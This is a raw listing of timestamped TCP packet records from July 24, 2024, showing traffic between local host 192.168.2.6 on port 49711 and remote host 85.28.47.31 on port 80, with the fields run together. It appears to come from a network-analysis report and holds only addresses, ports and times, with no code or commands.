                                                                                        Jul 24, 2024 07:14:13.114932060 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.114932060 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.114958048 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.122623920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.122637987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.122648954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.122699976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.122745991 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.122756958 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.122766972 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.122787952 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.122787952 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.122812033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.123148918 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.123207092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.123256922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.123266935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.123276949 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.123286963 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.123297930 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.123311996 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.123342991 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.123342991 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.124047041 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.124058008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.124067068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.124078035 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.124088049 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.124098063 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.124104977 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.124128103 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.124151945 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.125103951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.125117064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.125124931 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.125134945 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.125144958 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.125155926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.125159979 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.125166893 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.125184059 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.125205994 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.125226974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.125977039 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.125988960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.126003981 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.126014948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.126027107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.126034021 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.126038074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.126048088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.126054049 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.126075029 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.126097918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.127645969 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.127660036 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.127670050 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.127681017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.127691031 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.127700090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.127701998 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.127712965 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.127721071 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.127739906 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.127760887 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.129050970 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.129062891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.129071951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.129082918 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.129092932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.129103899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.129112959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.129113913 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.129151106 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.129163980 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.129170895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.129174948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.129213095 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.129213095 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.130769968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.130825996 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.130870104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.130887032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.130923033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.130948067 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.131110907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.131166935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.131232023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.131283045 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.131400108 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.131409883 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.131419897 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.131450891 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.131474972 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.131848097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.131859064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.131901026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.132071018 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.132081985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.132091999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.132121086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.132123947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.132132053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.132143021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.132143974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.132168055 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.132191896 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.133080006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133093119 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133101940 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133111954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133121967 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133137941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.133163929 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.133163929 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.133693933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133704901 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133714914 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133724928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133733988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133744955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.133747101 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.133774042 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.133796930 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.134674072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.134689093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.134697914 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.134707928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.134732008 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.134757042 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.135453939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.135467052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.135474920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.135509968 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.135535002 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.136079073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.136090994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.136101961 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.136111975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.136132956 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.136154890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.136909962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.136926889 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.136938095 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.136962891 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.136986017 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.195980072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.196016073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.196120977 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.196121931 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.196212053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.196223021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.196266890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.196552992 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.196563959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.196574926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.196613073 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.196613073 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.205240011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.205327988 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.205333948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.205347061 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.205384970 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.205385923 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.205692053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.205704927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.205714941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.205725908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.205737114 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.205744028 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.205770016 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.205792904 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.206542969 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.206554890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.206566095 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.206576109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.206585884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.206599951 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.206625938 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.206625938 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.207458973 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.207518101 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.217870951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.217909098 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.217941046 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.217982054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.217983007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.217983007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.218216896 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.218228102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.218240023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.218250036 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.218261957 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.218302965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.218302965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.218940973 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.218950987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.218962908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.218972921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.218982935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.218993902 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.219031096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.219949961 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.219960928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.219971895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.219983101 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.219991922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.220000982 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.220004082 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.220029116 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.220029116 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.220062971 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.221501112 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221513033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221524954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221534014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221544981 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221576929 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.221621037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.221920967 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221932888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221941948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221954107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221963882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221975088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.221985102 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.221985102 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.222048998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.222877026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.222887993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.222897053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.222908020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.222918034 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.222955942 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.222990036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.223767042 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.223778009 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.223788023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.223798990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.223809004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.223822117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.223824978 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.223844051 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.223858118 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.224745989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.224756956 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.224766970 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.224777937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.224786997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.224807024 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.224842072 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.225676060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.225687027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.225696087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.225707054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.225718021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.225728989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.225735903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.225739002 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.225755930 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.225768089 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.226641893 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.226653099 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.226663113 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.226672888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.226684093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.226695061 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.226707935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.226731062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.227611065 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.227622032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.227631092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.227644920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.227654934 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.227660894 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.227667093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.227686882 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.227705002 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.228692055 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.228703976 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.228715897 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.228727102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.228735924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.228744030 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.228748083 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.228765965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.228779078 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.229535103 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.229546070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.229554892 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.229566097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.229576111 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.229584932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.229598045 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.229609966 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.230470896 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.230482101 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.230492115 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.230504036 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.230513096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.230523109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.230524063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.230549097 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.230561972 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.231468916 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.231479883 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.231491089 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.231502056 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.231512070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.231520891 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.231542110 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.231563091 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.232245922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.232258081 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.232266903 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.232300043 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.232314110 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.293169022 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.293219090 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.293231964 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.293324947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.293399096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:13.293464899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.293476105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.293487072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:13.293498039 CEST804971185.28.47.31192.168.2.6
